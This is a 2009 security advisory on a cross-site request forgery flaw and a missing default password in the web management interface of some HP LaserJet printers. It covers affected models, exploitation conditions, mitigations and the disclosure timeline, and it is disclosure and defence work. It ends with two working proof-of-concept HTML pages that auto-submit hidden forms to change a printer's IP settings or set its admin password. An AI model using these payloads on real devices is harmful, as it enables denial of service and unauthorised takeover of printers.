HP Laserjet multiple models web management CSRF vulnerability & insecure default configuration
Louhi Networks Oy
-= Security Advisory =-
Advisory: HP LaserJet multiple models web management CSRF
vulnerability & insecure default configuration
Release Date: 2009-03-17
Last Modified: 2009-03-17
Authors: Henri Lindberg, CISA
[henri d0t lindberg at louhi d0t fi]
Application: HP Embedded Web Server
Devices: HP LaserJet M1522n MFP,
HP Color LaserJet 2605dtn
possibly other HP products
Attack type : CSRF
Risk: Low
Vendor Status: Issue documented in a customer notice
References: http://www.louhinetworks.fi/advisory/HP_20090317.txt
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566
Overview:
Quote from http://www.hp.com:
"Increase effectiveness and productivity with an easy-to-use
high-performance HP MFP. HP spherical toner and an intelligent
cartridge optimise print quality and reliability. Do more with
fast, high-quality print, copy, scan and fax functionality.
This affordable HP MFP delivers print, copy, scan and fax
functionality. Hi-Speed USB 2.0 connectivity and fast,
secure networking enable you to easily share this device.
Handle complex files with a 450 MHz processor and memory up to
64 MB."
Details:
Default configuration for the device does not require user to
define password for configuration changes.
Insecure out-of-the-box configuration combined with CSRF
vulnerability in web management interface allows attacker to
perform unwanted configuration changes through user's browser.
Successful exploitation requires:
1) Out-of-the-box configuration (no management password)
2) Internal user with access to web management interface
3) Knowledge of target printer's DNS name or IP address
4) Ability to lure internal user to a malicious website or
ability to inject malicious HTML/javascript to website
frequented by said internal user.
Simplest management interfaces contains few interesting
features, most significant impact can be achieved with invalid
network configuration. This results in denial-of-service
condition, requiring manual reconfiguration in order to
restore network connectivity.
More advanced management interfaces based on the some software
may contain additional features suitable for exploitation.
It is recommended to check the features of management interface
in order to determine the actual risk for the used product.
Mitigation:
1) Set administrator password
2) Do not browse untrusted sites while logged on to the
management interface
Advisory timeline:
2009-02-17 Contacted vendor through e-mail.
2009-02-17 Vendor response.
2009-03-12 Vendor decides not to patch but to release
a customer notice
2009-03-17 Coordinated release of information
Vendor's customer notice:
HP Security Notice HPSN-2009-001 rev.1
HP LaserJet Printers, HP Edgeline Printers,
and HP Digital Senders - Unverified Input
Proof of Concept:
<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post"
ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config";
style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration"
value="IPConfig=Man&IPAddr=1.1.1.1&SN=2.2.2.2&GW=3.3.3.3&WINS=0.0.0.0">
</form>
</body>
</html>
Invalid value for "Configuration" parameter sets IP, mask and gw to
255.255.255.255
<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post"
ACTION="http://1.2.3.4/hp/device/set_config_password.html/config";
style="display:none">
<INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
<INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
<INPUT type="hidden" VALUE="System">
</FORM>
</body>
<html>